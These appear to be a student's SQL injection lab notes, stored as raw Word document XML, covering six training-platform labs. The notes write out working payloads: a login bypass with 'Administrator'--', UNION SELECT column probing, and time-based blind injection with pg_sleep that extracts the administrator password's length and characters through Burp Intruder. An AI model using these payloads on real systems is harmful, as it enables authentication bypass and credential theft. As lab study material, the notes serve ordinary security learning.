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81884" w14:textId="616ED6C9" w:rsidR="00AA5B72" w:rsidRDefault="00AA5B72">
      <w:r>
        <w:t>Lab 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5695FF" w14:textId="7432C28B" w:rsidR="00210BA4" w:rsidRDefault="000E2AAD">
      <w:r w:rsidRPr="000E2AAD">
        <w:t>'+OR+1=1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003757BC">
        <w:t>--  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003757BC">
        <w:t>put in get for show all items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E536B" w14:textId="6FB312B3" w:rsidR="00AA5B72" w:rsidRDefault="00AA5B72"/>
    <w:p w14:paraId="43E14D45" w14:textId="5EBF7C3C" w:rsidR="00AA5B72" w:rsidRDefault="00AA5B72">
      <w:r>
        <w:t>Lab 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480383B" w14:textId="730E01AE" w:rsidR="00A753BE" w:rsidRDefault="00A753BE">
      <w:r>
        <w:t>Administrator’</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003C106F">
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00181221">
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00181221">
        <w:t>database login</w:t>
      </w:r>
      <w:r w:rsidR="00B321FF">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00D2686F">
        <w:t xml:space="preserve">put intercept on if you know the username is administrator put  </w:t>
      </w:r>
      <w:r w:rsidR="00D2686F">
        <w:t xml:space="preserve">Administrator’--  </w:t>
      </w:r>
      <w:r w:rsidR="00D2686F">
        <w:t xml:space="preserve">password any you can put </w:t>
      </w:r>
      <w:r w:rsidR="00181221">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B636206" w14:textId="2EB47D16" w:rsidR="00AA5B72" w:rsidRDefault="00AA5B72"/>
    <w:p w14:paraId="5D2F870A" w14:textId="59BFFAFB" w:rsidR="00AA5B72" w:rsidRDefault="00AA5B72">
      <w:r>
        <w:t>Lab 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C5FE0" w14:textId="6B7B2BC9" w:rsidR="00AA5B72" w:rsidRDefault="00AA5B72">
      <w:r>
        <w:t xml:space="preserve">To find out how many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>databses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B9FB9" w14:textId="7F233C58" w:rsidR="00AA5B72" w:rsidRDefault="00AA5B72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'+UNION+SELECT+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NULL,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F61C5C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>,NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00F61C5C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  (Null one column two null means 2 column put until without getting error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEED30" w14:textId="6E6E0F98" w:rsidR="00BE56CF" w:rsidRDefault="00BE56CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F592D29" w14:textId="44DDEBEC" w:rsidR="00BE56CF" w:rsidRDefault="00BE56CF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Lab 4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509BCF42" w14:textId="7D55CC06" w:rsidR="00AA5B72" w:rsidRDefault="00BE56CF">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>'+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>UNION+SELECT+</w:t>
      </w:r>
      <w:r w:rsidR="003C0866">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00C667A2">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003C0866">
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>,NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>,NUL</w:t>
      </w:r>
      <w:r w:rsidR="002D70AC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D70AC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00BE5263">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>( r</w:t>
      </w:r>
      <w:r>
        <w:t>eplacing each null with the random value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to find out which column have data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A14B68" w14:textId="2735E1B2" w:rsidR="00FE6F64" w:rsidRDefault="00FE6F64"/>
    <w:p w14:paraId="59203B1C" w14:textId="37B844E1" w:rsidR="005131E0" w:rsidRDefault="005131E0">
      <w:r>
        <w:t xml:space="preserve">Lab 5 </w:t>
      </w:r>
      <w:r w:rsidR="00B01336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333742F5" w14:textId="45C57A2B" w:rsidR="00B01336" w:rsidRDefault="002921F4">
      <w:r>
        <w:t xml:space="preserve">Check Time delay </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>response  is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> working or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC972B" w14:textId="1255AAE8" w:rsidR="002921F4" w:rsidRDefault="002921F4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TrackingId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>=x'||</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>pg_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>sleep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10)</w:t>
      </w:r>
      <w:r w:rsidR="00974F1A">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE865F" w14:textId="7B8A5195" w:rsidR="00974F1A" w:rsidRDefault="00974F1A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0468B007" w14:textId="549295DE" w:rsidR="00974F1A" w:rsidRDefault="00974F1A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Lab 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C3B25" w14:textId="143CFCD7" w:rsidR="00974F1A" w:rsidRDefault="009C0858">
      <w:r>
        <w:t xml:space="preserve">1, check time delay response is working or not </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC85E6" w14:textId="20696696" w:rsidR="009C0858" w:rsidRDefault="009C0858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TrackingId=x'%3BSELECT+CASE+WHEN+(1=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END</w:t>
      </w:r>
      <w:r w:rsidR="00061E6F">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4423CE" w14:textId="57984FB1" w:rsidR="00061E6F" w:rsidRDefault="00061E6F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2, to check to response immediately </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09361192" w14:textId="0FF39D5A" w:rsidR="00061E6F" w:rsidRDefault="00AA164A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TrackingId=x'%3BSELECT+CASE+WHEN+(1=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END</w:t>
      </w:r>
      <w:r w:rsidR="0085038A">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E526C8D" w14:textId="378A8FD5" w:rsidR="0085038A" w:rsidRDefault="0085038A">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">3, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">confirming that there is a user called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BCA82F" w14:textId="605B1D19" w:rsidR="0085038A" w:rsidRDefault="0085038A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TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>')+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users</w:t>
      </w:r>
      <w:r w:rsidR="00B01062">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6566B9" w14:textId="4D015FE4" w:rsidR="00B01062" w:rsidRDefault="00B01062">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FC81F0" w14:textId="3FE0F8DA" w:rsidR="00B01062" w:rsidRDefault="00B01062">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B79C70" w14:textId="02F934FB" w:rsidR="00B01062" w:rsidRDefault="00B01062">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D722ED1" w14:textId="72B5B5AE" w:rsidR="00B01062" w:rsidRDefault="00B01062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lastRenderedPageBreak/>
        <w:t>4, how many characters in password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC9D02" w14:textId="612036FB" w:rsidR="00B01062" w:rsidRDefault="00B01062">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEA328C" w14:textId="02BCBF70" w:rsidR="00B01062" w:rsidRDefault="00B01062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TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>LENGTH(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>password)&gt;1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users</w:t>
      </w:r>
      <w:r w:rsidR="00AC12E1">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5291D784" w14:textId="3CD8B521" w:rsidR="00AC12E1" w:rsidRDefault="00AC12E1" w:rsidP="00AC12E1">
      <w:r>
        <w:t>Action-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendtointruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – intruder – ad$ - payload </w:t>
      </w:r>
      <w:r w:rsidR="007C368D">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439E2D2B" w14:textId="34BFB7FA" w:rsidR="007C368D" w:rsidRDefault="007C368D" w:rsidP="00AC12E1">
      <w:r>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>letter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E08CC49" w14:textId="77777777" w:rsidR="00AC12E1" w:rsidRDefault="00AC12E1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7391FAFC" w14:textId="13D5743C" w:rsidR="00AC12E1" w:rsidRDefault="00AC12E1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED8D1D3" w14:textId="41D02D34" w:rsidR="00AC12E1" w:rsidRDefault="00AC12E1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5, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>charcter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> find out </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6302BF" w14:textId="19686CF8" w:rsidR="00AC12E1" w:rsidRPr="00B01062" w:rsidRDefault="00AC12E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SUBSTRING(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72903B0C" w14:textId="0A906B5D" w:rsidR="00FE6F64" w:rsidRDefault="00FE6F64">
      <w:r>
        <w:t>Action-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendtointruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – intruder – ad$</w:t>
      </w:r>
      <w:r w:rsidR="000D643C">
        <w:t xml:space="preserve"> - payload </w:t>
      </w:r>
      <w:r w:rsidR="00EA4D30">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000D643C">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB169D" w14:textId="12AD3C84" w:rsidR="00566898" w:rsidRDefault="007C368D" w:rsidP="007C368D">
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00566898">
        <w:t>r49x366207itskrhir</w:t>
      </w:r>
      <w:r w:rsidR="00566898">
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C6C3A" w14:textId="63A0C542" w:rsidR="00181221" w:rsidRDefault="00181221"/>
    <w:p w14:paraId="29BC6D2A" w14:textId="4D16F6E4" w:rsidR="00181221" w:rsidRDefault="00181221"/>
    <w:sectPr w:rsidR="0018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78"/>
    <w:rsid w:val="00061E6F"/>
    <w:rsid w:val="00087EBC"/>
    <w:rsid w:val="000D643C"/>
    <w:rsid w:val="000E2AAD"/>
    <w:rsid w:val="00181221"/>
    <w:rsid w:val="00210BA4"/>
    <w:rsid w:val="00231B10"/>
    <w:rsid w:val="002921F4"/>
    <w:rsid w:val="002D70AC"/>
    <w:rsid w:val="003757BC"/>
    <w:rsid w:val="003B2315"/>
    <w:rsid w:val="003C0866"/>
    <w:rsid w:val="003C106F"/>
    <w:rsid w:val="00405C0D"/>
    <w:rsid w:val="005131E0"/>
    <w:rsid w:val="00563589"/>
    <w:rsid w:val="00566898"/>
    <w:rsid w:val="005B34DE"/>
    <w:rsid w:val="006B4DDA"/>
    <w:rsid w:val="007C368D"/>
    <w:rsid w:val="0085038A"/>
    <w:rsid w:val="00882A29"/>
    <w:rsid w:val="008B70C0"/>
    <w:rsid w:val="00910034"/>
    <w:rsid w:val="00974F1A"/>
    <w:rsid w:val="009C0858"/>
    <w:rsid w:val="00A65040"/>
    <w:rsid w:val="00A753BE"/>
    <w:rsid w:val="00AA164A"/>
    <w:rsid w:val="00AA5B72"/>
    <w:rsid w:val="00AC12E1"/>
    <w:rsid w:val="00B01062"/>
    <w:rsid w:val="00B01336"/>
    <w:rsid w:val="00B12893"/>
    <w:rsid w:val="00B321FF"/>
    <w:rsid w:val="00BE5263"/>
    <w:rsid w:val="00BE56CF"/>
    <w:rsid w:val="00C42D78"/>
    <w:rsid w:val="00C667A2"/>
    <w:rsid w:val="00CA5C90"/>
    <w:rsid w:val="00D2686F"/>
    <w:rsid w:val="00D509BB"/>
    <w:rsid w:val="00EA4D30"/>
    <w:rsid w:val="00EE5691"/>
    <w:rsid w:val="00F61C5C"/>
    <w:rsid w:val="00F75467"/>
    <w:rsid w:val="00FA7F27"/>
    <w:rsid w:val="00FE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9130"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A04E9014-F4E5-447B-A225-F0C78D8B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A5B7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C36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43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-19T16:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-25T17:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>